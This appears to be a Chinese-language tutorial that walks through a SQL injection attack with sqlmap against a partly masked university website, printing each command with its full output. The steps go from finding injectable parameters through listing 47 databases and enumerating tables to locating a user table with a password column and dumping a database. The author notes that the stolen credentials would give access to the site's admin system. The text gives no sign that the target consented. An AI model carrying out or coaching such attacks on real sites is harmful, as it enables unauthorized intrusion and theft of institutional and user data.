SQL注入是啥就不解釋了。下面演示一個SQL注入的例子
SQL注入點可以自己嘗試或用SQL注入漏洞掃描工具去尋找,這里用大名鼎鼎的sqlmap演示一個現成的案例。
1.漏洞試探
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:16:27 [12:16:27] [INFO] resuming back-end DBMS 'microsoft sql server' [12:16:27] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=87'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=87' WAITFOR DELAY '0:0:5'-- --- [12:16:27] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [12:16:27] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn' [*] shutting down at 12:16:27
可以看到這個站點是有SQL注入點的,連系統/應用/sql類型都爆出來了。接下來我們來探索一下這個數據庫里有些什么。
2.查看數據庫
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 --dbs ... sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=87'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=87' WAITFOR DELAY '0:0:5'-- --- [12:16:59] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [12:16:59] [INFO] fetching database names [12:16:59] [INFO] fetching number of databases [12:16:59] [INFO] resumed: 47 [12:16:59] [INFO] resumed: BZBB_lw [12:16:59] [INFO] resumed: ChualgXinNS [12:16:59] [INFO] resumed: db_dike [12:16:59] [INFO] resumed: db_dndqjzw [12:16:59] [INFO] resumed: db_njsdjw [12:16:59] [INFO] resumed: db_njsfsy [12:16:59] [INFO] resumed: db_nsddlhj [12:16:59] [INFO] resumed: db_nsdhgxn [12:16:59] [INFO] resumed: db_nsdmba [12:16:59] [INFO] resumed: db_nsdMediaC [12:16:59] [INFO] resumed: db_nsdscw [12:16:59] [INFO] resumed: db_nsdsw [12:16:59] [INFO] resumed: db_nsdswyy [12:16:59] [INFO] resumed: db_nsdswzy [12:16:59] [INFO] resumed: db_nyspjc [12:16:59] [INFO] resumed: db_sdjxjy [12:16:59] [INFO] resumed: db_spaqjc [12:16:59] [INFO] resumed: JiaoCai [12:16:59] [INFO] resumed: maste@ [12:16:59] [INFO] resumed: MBA [12:16:59] [INFO] resumed: model [12:16:59] [INFO] resumed: msdb [12:16:59] [INFO] resumed: njnulab [12:16:59] [INFO] resumed: njnupj [12:16:59] [INFO] resumed: nju [12:16:59] [INFO] resumed: nju2222 [12:16:59] [INFO] resumed: njuold [12:16:59] [INFO] resumed: njupj2012 [12:16:59] [INFO] resumed: Northwind [12:16:59] [INFO] resumed: NSD_ApplicationChemical [12:16:59] [INFO] resumed: NSD_Cnooc [12:16:59] [INFO] resumed: NSD_ElectricalEngineering [12:16:59] [INFO] resumed: NSD_ElectronicInformation [12:16:59] [INFO] resumed: NSD_TeacherSkills [12:16:59] [INFO] resumed: NSD_TeachingTeam [12:16:59] [INFO] resumed: nsddky_sy [12:16:59] [INFO] resumed: nsdsfjdzx [12:16:59] [INFO] resumed: nsdsfjdzxnew [12:16:59] [INFO] resumed: nsglxt [12:16:59] [INFO] resumed: NSHuaKe [12:16:59] [INFO] resumed: NSXinLiXue [12:16:59] [INFO] resumed: NY_JG [12:16:59] [INFO] resumed: pubs [12:16:59] [INFO] resumed: ShangXueYuannew [12:16:59] [INFO] resumed: tempdb [12:16:59] [INFO] resumed: zhongxin [12:16:59] [INFO] resumed: zhongxinold available databases [47]: [*] BZBB_lw [*] ChualgXinNS [*] db_dike [*] db_dndqjzw [*] db_njsdjw [*] db_njsfsy [*] db_nsddlhj [*] db_nsdhgxn [*] db_nsdmba [*] db_nsdMediaC [*] db_nsdscw [*] db_nsdsw [*] db_nsdswyy [*] db_nsdswzy [*] db_nyspjc [*] db_sdjxjy [*] db_spaqjc [*] JiaoCai [*] maste@ [*] MBA [*] model [*] msdb [*] njnulab [*] njnupj [*] nju [*] nju2222 [*] njuold [*] njupj2012 [*] Northwind [*] NSD_ApplicationChemical [*] NSD_Cnooc [*] NSD_ElectricalEngineering [*] NSD_ElectronicInformation [*] NSD_TeacherSkills [*] NSD_TeachingTeam [*] nsddky_sy [*] nsdsfjdzx [*] nsdsfjdzxnew [*] nsglxt [*] NSHuaKe [*] NSXinLiXue [*] NY_JG [*] pubs [*] ShangXueYuannew [*] tempdb [*] zhongxin [*] zhongxinold [12:16:59] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn' [*] shutting down at 12:16:59
3.省略部分日志,可以看到所有的數據庫都已經找到了,接下來可以查看具體的表。
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D JiaoCai --tables --threads 5 ... [12:18:44] [INFO] resuming back-end DBMS 'microsoft sql server' [12:18:44] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=87'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=87' WAITFOR DELAY '0:0:5'-- --- [12:18:45] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [12:18:45] [INFO] fetching tables for database: JiaoCai [12:18:45] [INFO] fetching number of tables for database 'JiaoCai' [12:18:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [12:18:45] [INFO] retrieved: [12:18:46] [WARNING] reflective value(s) found and filtering out 23 [12:18:58] [INFO] retrieved: dbo.dtproperties [12:21:19] [INFO] retrieved: dbo.sysconstraints [12:23:12] [INFO] retrieved: dbo.syssegments [12:24:48] [INFO] retrieved: dbo.T_BuildYxJc [12:28:11] [INFO] retrieved: dbo.T_BuildZdJc [12:30:01] [INFO] retrieved: dbo.T_CanYu [12:30:44] [INFO] retrieved: dbo.T_EndDate [12:31:44] [INFO] retrieved: dbo.T_G_BuildYxJc [12:33:25] [INFO] retrieved: dbo.T_G_Bu [12:34:13] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [12:34:44] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request ildZdJc [12:35:31] [INFO] retrieved: dbo.T_G_Ca [12:37:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request nYu [12:38:58] [INFO] retrieved: dbo.T_G_EndDate [12:40:49] [INFO] retrieved: dbo.T_G_JiaoCai [12:42:38] [INFO] retrieved: dbo.T_G_News [12:43:17] [INFO] retrieved: dbo.T_G_User [12:45:51] [INFO] retrieved: dbo.T_G_XueYuan [12:47:55] [INFO] retrieved: dbo.T_G_ZhuanYe [12:49:35] [INFO] retrieved: dbo.T_G_ZyToJc [12:50:48] [INFO] retrieved: dbo.T_JiaoCai [12:52:08] [INFO] retrieved: dbo.T_News [12:53:21] [INFO] retrieved: dbo.T_U [12:55:32] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request ser [12:55:55] [INFO] retrieved: dbo.T_XueYuan [12:56:43] [INFO] retrieved: dbo.T_ZhuanYe [12:59:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [13:00:05] [INFO] retrieved: dbo.T_ZyToJc Database: JiaoCai [23 tables] +----------------+ | T_BuildYxJc | | T_BuildZdJc | | T_CanYu | | T_EndDate | | T_G_BuildYxJc | | T_G_BuildZdJc | | T_G_CanYu | | T_G_EndDate | | T_G_JiaoCai | | T_G_News | | T_G_User | | T_G_XueYuan | | T_G_ZhuanYe | | T_G_ZyToJc | | T_JiaoCai | | T_News | | T_User | | T_XueYuan | | T_ZhuanYe | | T_ZyToJc | | dtproperties | | sysconstraints | | syssegments | +----------------+ [13:01:44] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 1473 times [13:01:44] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn' [*] shutting down at 13:01:44
4.找到自己想要的表,如果你找到了存放user和passwd的表,那么你就可以后台登錄他們的管理系統了。
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D ShangXueYuannew -T T_User --columns --threads 5 ... HTTP(s) requests: --- Place: GET Parameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=87' AND 8841=8841 AND 'bZbc'='bZbc Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=87'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=87' WAITFOR DELAY '0:0:5'-- --- [13:00:51] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [13:00:51] [INFO] fetching columns for table 'T_User' in database 'ShangXueYuannew' [13:00:51] [INFO] retrieved: [13:00:52] [WARNING] reflective value(s) found and filtering out 7 [13:00:55] [INFO] retrieving the length of query output [13:00:55] [INFO] retrieved: 9 [13:01:17] [INFO] retrieved: FileTheme [13:01:17] [INFO] retrieving the length of query output [13:01:17] [INFO] retrieved: 7 [13:02:06] [INFO] retrieved: varchar [13:02:06] [INFO] retrieving the length of query output [13:02:06] [INFO] retrieved: 3 [13:02:19] [INFO] retrieved: Pwd [13:02:19] [INFO] retrieving the length of query output [13:02:19] [INFO] retrieved: 7 [13:03:11] [INFO] retrieved: varchar [13:03:11] [INFO] retrieving the length of query output [13:03:11] [INFO] retrieved: 4 [13:03:27] [INFO] retrieved: Role [13:03:27] [INFO] retrieving the length of query output [13:03:27] [INFO] retrieved: 7 [13:03:44] [INFO] retrieved: varchar [13:03:44] [INFO] retrieving the length of query output [13:03:44] [INFO] retrieved: 8 [13:04:13] [INFO] retrieved: UserFile [13:04:13] [INFO] retrieving the length of query output [13:04:13] [INFO] retrieved: 7 [13:04:32] [INFO] retrieved: varchar [13:04:32] [INFO] retrieving the length of query output [13:04:32] [INFO] retrieved: 6 [13:06:21] [INFO] retrieved: UserId [13:06:21] [INFO] retrieving the length of query output [13:06:21] [INFO] retrieved: 7 [13:07:14] [INFO] retrieved: varcha_ 6/7 (86%) [13:07:46] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [13:07:46] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads') [13:08:17] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [13:09:18] [INFO] retrieved: varchar [13:09:18] [INFO] retrieving the length of query output [13:09:18] [INFO] retrieved: 8 [13:09:52] [INFO] retrieved: UserName [13:09:52] [INFO] retrieving the length of query output [13:09:52] [INFO] retrieved: 7 [13:10:36] [INFO] retrieved: va_cha_ 5/7 (71%) [13:11:06] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [13:11:07] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request [13:12:07] [INFO] retrieved: varchar [13:12:07] [INFO] retrieving the length of query output [13:12:07] [INFO] retrieved: 6 [13:12:35] [INFO] retrieved: UserNo [13:12:35] [INFO] retrieving the length of query output [13:12:35] [INFO] retrieved: 3 [13:12:46] [INFO] retrieved: int Database: ShangXueYuannew Table: T_User [7 columns] +-----------+---------+ | Column | Type | +-----------+---------+ | FileTheme | varchar | | Pwd | varchar | | Role | varchar | | UserFile | varchar | | UserId | varchar | | UserName | varchar | | UserNo | int | +-----------+---------+ [13:12:46] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 727 times [13:12:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn' [*] shutting down at 13:12:46
5.甚至你可以把想要的數據庫下載下來,在本地慢慢研究
root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D ShangXueYuannew --dump --threads 5
時間相當長,完了后就能看到SQL的具體內容了。
Database: ShangXueYuannew Table: T_Acceptance [10 entries] +-----+-----+------------+------------+------------+------------+---------------------------+--------+ | aId | aNo | aRar | aPdf | aWord | aFlash | aTitle | aState | +-----+-----+------------+------------+------------+------------+---------------------------+--------+ | NULL | 1 | 969655.rar | NULL | NULL | NULL | NULL | -502 | | 0 | 11 | NULL | 481991.pdf | 481991.doc | 159067.swf | 江蘇省高等學校實驗教學示范中心2011年驗收申請表 | -501 | | 0 | 12 | NULL | 520703.pdf | 520703.doc | 520703.swf | 江蘇省高等學校基礎課實驗教學示范中心立項申報表 | -501 | | 0 | 13 | NULL | 771297.pdf | 771297.doc | 448373.swf | 支撐材料之一:經濟管理教學實驗中心整體介紹 | -501 | | 0 | 14 | NULL | 493219.pdf | 349602.doc | 493219.swf | 支撐材料之二:實驗室相關政策措施及規章制度 | -501 | | 0 | 15 | NULL | 882516.pdf | 559592.doc | 559592.swf | 支撐材料之三:課程實驗教學計划及實驗項目 | -501 | | 0 | 16 | NULL | 783892.pdf | 917744.doc | 138044.swf | 支撐材料之四:典型自編課程實驗講義 | -501 | | 0 | 17 | NULL | 332145.pdf | 593306.doc | 332145.swf | 支撐材料之五:典型多媒體課件簡介 | -501 | | 0 | 18 | NULL | 811424.pdf | 811424.doc | 811424.swf | 支撐材料之߸ߢ經濟ߢ理教學實驗中心建設成果 | -501 | | NULL | 2 | 241811.rar | NULL | NULL | NULL | NULL | -503 | +-----+-----+------------+------------+------------+------------+---------------------------+--------+